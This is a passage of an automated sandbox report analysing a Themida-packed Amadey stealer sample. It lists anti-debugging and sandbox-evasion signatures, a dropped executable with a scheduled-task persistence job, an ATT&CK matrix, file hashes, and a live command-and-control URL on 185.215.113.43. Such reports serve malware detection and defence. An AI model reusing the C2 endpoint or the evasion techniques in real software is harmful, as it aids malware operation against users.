                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390703 second address: 5390707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390707 second address: 539070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539070B second address: 5390711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390711 second address: 539078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FD2884F85CEh 0x00000010 mov ecx, 1F2154F1h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov cx, dx 0x0000001b pushfd 0x0000001c jmp 00007FD2884F85D9h 0x00000021 adc ecx, 252D6A36h 0x00000027 jmp 00007FD2884F85D1h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD2884F85CDh 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539078B second address: 53907B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53907B0 second address: 5390804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD2884F85D1h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FD2884F85CEh 0x00000015 mov eax, dword ptr [7743B370h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD2884F85D7h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390804 second address: 5390858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD288CC4A6Fh 0x00000009 or ax, 883Eh 0x0000000e jmp 00007FD288CC4A79h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD288CC4A76h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390858 second address: 539085C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539085C second address: 5390862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390862 second address: 53908B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f call 00007FD2884F85D8h 0x00000014 jmp 00007FD2884F85D2h 0x00000019 pop ecx 0x0000001a popad 0x0000001b push esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edi 0x00000021 mov edi, 6121B7CAh 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53908B2 second address: 53908B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BAEADB instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BAEB9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D5672C instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDAAA0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DCEADB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DCEB9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: F7672C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FFAAA0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053E0291 rdtsc 0_2_053E0291
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 454Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3968Thread sleep time: -42021s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044Thread sleep count: 51 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044Thread sleep time: -102051s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1492Thread sleep count: 42 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1492Thread sleep time: -84042s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648Thread sleep count: 454 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648Thread sleep time: -13620000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3460Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6368Thread sleep count: 41 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6368Thread sleep time: -82041s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: skotes.exe, 00000006.00000002.3380064228.00000000014A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.2193792120.0000000000D2C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2228849443.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2235071091.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: skotes.exe, 00000006.00000002.3380064228.000000000146A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: skotes.exe, 00000006.00000002.3380064228.00000000014A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=lBR
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Potentially malicious time measurement code found
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053E058C Start: 053E078E End: 053E05EE0_2_053E058C
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053E0291 rdtsc 0_2_053E0291
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D9652B mov eax, dword ptr fs:[00000030h]6_2_00D9652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D9A302 mov eax, dword ptr fs:[00000030h]6_2_00D9A302
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: #&PProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D7D3E2 cpuid 6_2_00D7D3E2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00D7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00D7CBEA

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 0.2.file.exe.b40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.skotes.exe.d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.skotes.exe.d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2797199366.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2193715965.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2153521892.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe55%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe55%ReversingLabsWin32.Packed.Themida
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe54%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.43/Zu7JuNko/index.php15.113.43a100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.43/Zu7JuNko/index.php4skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.43/Zu7JuNko/index.php:skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.43/Zu7JuNko/index.php8skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.43/Zu7JuNko/index.php;skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.43/Zu7JuNko/index.php&skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://185.215.113.43/Zu7JuNko/index.phpDskotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.215.113.43/Zu7JuNko/index.php15.113.43askotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://185.215.113.43/Zu7JuNko/index.phpHskotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://185.215.113.43/Zu7JuNko/index.php-skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://185.215.113.43/Zu7JuNko/index.phpnskotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://185.215.113.43/Zu7JuNko/index.phpLskotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://185.215.113.43/Zu7JuNko/index.phplskotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                185.215.113.43
                                                		unknownPortugal
                                                		206894WHOLESALECONNECTIONSNLtrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1561633
                                                Start date and time:2024-11-24 02:21:04 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 39s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:file.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                                                EGA Information:
                                                • Successful, ratio: 25%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target file.exe, PID 1548 because it is empty
                                                • Execution Graph export aborted for target skotes.exe, PID 3064 because there are no executed function
                                                • Execution Graph export aborted for target skotes.exe, PID 4864 because there are no executed function
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:21:58Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                20:23:02API Interceptor1034x Sleep call for process: skotes.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                185.215.113.43file.exeGet hashmaliciousAmadeyBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php
                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                • 185.215.113.43/Zu7JuNko/index.php

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                • 185.215.113.16
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 185.215.113.16
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 185.215.113.206
                                                file.exeGet hashmaliciousAmadeyBrowse
                                                • 185.215.113.43
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.215.113.206
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 185.215.113.206
                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 185.215.113.16
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.215.113.206
                                                2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 185.215.113.206
                                                file.exeGet hashmaliciousStealcBrowse
                                                • 185.215.113.206

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1884672
                                                Entropy (8bit):7.9510844124633255
                                                Encrypted:false
                                                SSDEEP:49152:rD4pAVIEUn78EYltySaV85C1E/K4fvnMPgn/E:r8+VOn4EY6gfK4cP/
                                                MD5:6D76634E0D5A3748DBB40ED91D91480A
                                                SHA1:70FA798C82153DB02E218B3A7EFA2F56F051CCED
                                                SHA-256:D99688821D8644F9E44764BE9944C327ABC3162866E51AD78A02DCDC25A08730
                                                SHA-512:137B80797C2158247ADB3A7A865B5D0A44CF096B0A6C9377F2E548B5475D811273F0A367AA11DB74538474DF64FE58384F04CE013D9D5395904E68A8EDF9AF9A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 55%
                                                • Antivirus: Virustotal, Detection: 54%, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@..........................@K...........@.................................W...k.......D.....................J.............................L.J..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...iaxkupqh.....P1.....................@...fnhucfqp......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Windows\Tasks\skotes.job

                                                Download File
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):302
